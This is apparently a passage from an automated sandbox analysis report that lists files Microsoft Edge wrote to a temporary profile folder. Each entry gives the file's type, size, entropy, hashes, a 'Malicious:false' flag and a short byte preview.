                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48
                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:7JCWFjEtv5:QWqtx
                                                                                                              MD5:3C9BBBD67DCC0AEE4460DE770F446AE3
                                                                                                              SHA1:48163C6722C05289B6DB5F9AA6E67F60D87231A9
                                                                                                              SHA-256:324BA9E7CE493BE9DF1FD25CAD6089AD2B1F8F1BE0D0BB89CD7DB36ACE95E215
                                                                                                              SHA-512:653DAE8844CE47FBFC847928FD9C68680F54CC3F1A3FBC43BD57813EB1610036EEF89690E1641344B967BB93F4B3DB3128FD15B4B404DCC0E1FAD292847521AF
                                                                                                              Malicious:false
                                                                                                              Preview:(...f,'.oy retne........................1c..../.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Code Cache\wasm\index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):24
                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:m+l:m
                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                              Malicious:false
                                                                                                              Preview:0\r..m..................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Code Cache\wasm\index-dir\temp-index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48
                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:AiHC0EN34TA+:AiHqNIk+
                                                                                                              MD5:CD1F8B165B153D99C15F45C7C96D4970
                                                                                                              SHA1:B02ABBA0F5FF15BD54A07D9A464AFFF9B5EF6CCF
                                                                                                              SHA-256:A0EE4A6691F50434FE83D0CD38C2E1397B133D6065A1A4A38705D14588D91FBA
                                                                                                              SHA-512:9AC4FC96D408E0545AB5A5D6A32E7BCCD197A41A754154F4C1C774D2D66A498890FA1F7713D2D1029927E5566E2ADE9EC96EB883267ED9C721E37BCA7FF1F7FA
                                                                                                              Malicious:false
                                                                                                              Preview:(...].X.oy retne............................../.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\DawnCache\data_0

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                              Malicious:false
                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\DawnCache\data_1

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):270336
                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\DawnCache\data_2

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\DawnCache\data_3

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\DawnCache\index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):262512
                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:LsNl9tDll:Ls3PDll
                                                                                                              MD5:8942CF2887B1C0D11EA8A22754ADAF40
                                                                                                              SHA1:A385C5F32729F45AD32A74C70A7B9F8281BDCCBE
                                                                                                              SHA-256:109994A7B80E81A2A5FBE091743F1809F9A0BF4D1EECD174353CBD03D325BD01
                                                                                                              SHA-512:DDCC500B0F82F66BB0BFD882436BA6DB1E69BE52F1E55EE3DDD5C76D79CE47F800940780D0EF4382B3843BD6807283C48A9533FB2D414CF5B6503FB1F1D6F6F6
                                                                                                              Malicious:false
                                                                                                              Preview:.........................................a..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):33
                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                              Malicious:false
                                                                                                              Preview:...m.................DB_VERSION.1

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):293
                                                                                                              Entropy (8bit):5.406920649862789
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:YxEmRRM1e0i23fQXnG2tbB2KLlaxpb8q2Pe0i23fQXnG2tMsIFUv:YCukZWn9VFLQPgvvZWn9GFUv
                                                                                                              MD5:62434867B1953A299F534716306FFC7F
                                                                                                              SHA1:D8EE9C9BA6E37F774C75775CBE4567EDD3BC40DE
                                                                                                              SHA-256:9353D024C5C9E39A96EE91F28D3A2DDC9AD69653916833069B2E8C48D3D0325E
                                                                                                              SHA-512:AC86A76601044EB4F415DA68750EB8D786B23E32C0A6DE8C8E11DE8025FE374B4DABC6D612FCD220A1D6F267A7EB0460A3386E5C2AAB39D7BC67FD48DE10C2B9
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:42.798 1e74 Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\EdgeCoupons/coupons_data.db since it was missing..2024/12/05-04:39:42.849 1e74 Reusing MANIFEST C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41
                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                              Malicious:false
                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Extension Rules\000001.dbtmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Extension Rules\000003.log

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):171
                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                              MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                              SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                              SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                              SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                              Malicious:false
                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Extension Rules\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):269
                                                                                                              Entropy (8bit):5.34379285842358
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:Yx5SM1e0i23fQX8aVdg2KLlaxPP8yq2Pe0i23fQX8aPrqIFUv:Y/SkZW0LQVPxvvZWL3FUv
                                                                                                              MD5:1E51EA7B1DF0904207297EC91D519074
                                                                                                              SHA1:B99E2F2CDB6795187016100C31B3D1AA523E7FC9
                                                                                                              SHA-256:72CFC0862E996B24FB0070EE3DF4CDC56C0CC477888AD871701D79D0ED80D6FF
                                                                                                              SHA-512:271F59D5BE1CCB1C5EECFD1CEB5A6425D3DAE89A53E9A4D2EFF35BB3CD262C8CBC84B337688CEBAE471D507818D0283AEA860D8F25B5B73F27E68A705F9AAC74
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:42.797 1e94 Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Extension Rules since it was missing..2024/12/05-04:39:42.958 1e94 Reusing MANIFEST C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Extension Rules/MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Extension Rules\MANIFEST-000001

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41
                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                              Malicious:false
                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Extension Scripts\000001.dbtmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Extension Scripts\000003.log

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):171
                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                              MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                              SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                              SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                              SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                              Malicious:false
                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Extension Scripts\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):273
                                                                                                              Entropy (8bit):5.320601691685092
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:YxAaAAuM1e0i23fQX86FB2KLlawWlyq2Pe0i23fQX865IFUv:YR9ukZW/FFLQPIvvZW/WFUv
                                                                                                              MD5:0DA399EAAB4C05F46DCC39E272DA714E
                                                                                                              SHA1:93155E8233EB15885FE4D2446E3520E6FEC2EA77
                                                                                                              SHA-256:68322C9EE921362E7A62112EE811D4D6BF8581DFA36D2B5851B443975927E71A
                                                                                                              SHA-512:929B8FA9B2F0D784F4D4F65E1580B39A77A8BAC6535CFE3E0729D3F3B870CB1EF6D6978467860EC1FDB50EB0241985C82114B831FD4B022F8CC8C419720889D4
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:42.986 1e94 Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Extension Scripts since it was missing..2024/12/05-04:39:43.024 1e94 Reusing MANIFEST C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Extension Scripts/MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Extension Scripts\MANIFEST-000001

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41
                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                              Malicious:false
                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Favicons

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):0.6975083372685086
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:LLiZxh0GY/l1rWR1PmCx9fZjsBX+T6UwcE85fBmI:EBmw6fU1zBmI
                                                                                                              MD5:F5BBD8449A9C3AB28AC2DE45E9059B01
                                                                                                              SHA1:C569D730853C33234AF2402E69C19E0C057EC165
                                                                                                              SHA-256:825FF36C4431084C76F3D22CE0C75FA321EA680D1F8548706B43E60FCF5B566E
                                                                                                              SHA-512:96ACDED5A51236630A64FAE91B8FA9FAB43E22E0C1BCB80C2DD8D4829E03FBFA75AA6438053599A42EC4BBCF805BF0B1E6DFF9069B2BA182AD0BB30F2542FD3F
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\GPUCache\data_0

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                              Malicious:false
                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\GPUCache\data_1

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):270336
                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\GPUCache\data_2

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\GPUCache\data_3

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\GPUCache\index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):262512
                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:LsNltxLllll:Ls3Xllll
                                                                                                              MD5:3A79C4B060718928AC42A1A5869C86B4
                                                                                                              SHA1:2572E4930B5D9EB7C7B36E2F7D4A79519B305475
                                                                                                              SHA-256:EEBFDE336A2B03E06CB1FE809CB75335A64F5D63D24017BED14D6AABD44D6F7A
                                                                                                              SHA-512:38511397ACC921A9C8659A77334AB49BBCE928B9F77AB4FC419214F36B491A408F36AC14557A5B503166D02DDEAC8BEDBF027354860D007651171AC314E67BE4
                                                                                                              Malicious:false
                                                                                                              Preview:............................................../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\History

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                              Category:dropped
                                                                                                              Size (bytes):155648
                                                                                                              Entropy (8bit):0.5407252242845243
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                              MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                              SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                              SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                              SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                              Malicious:false
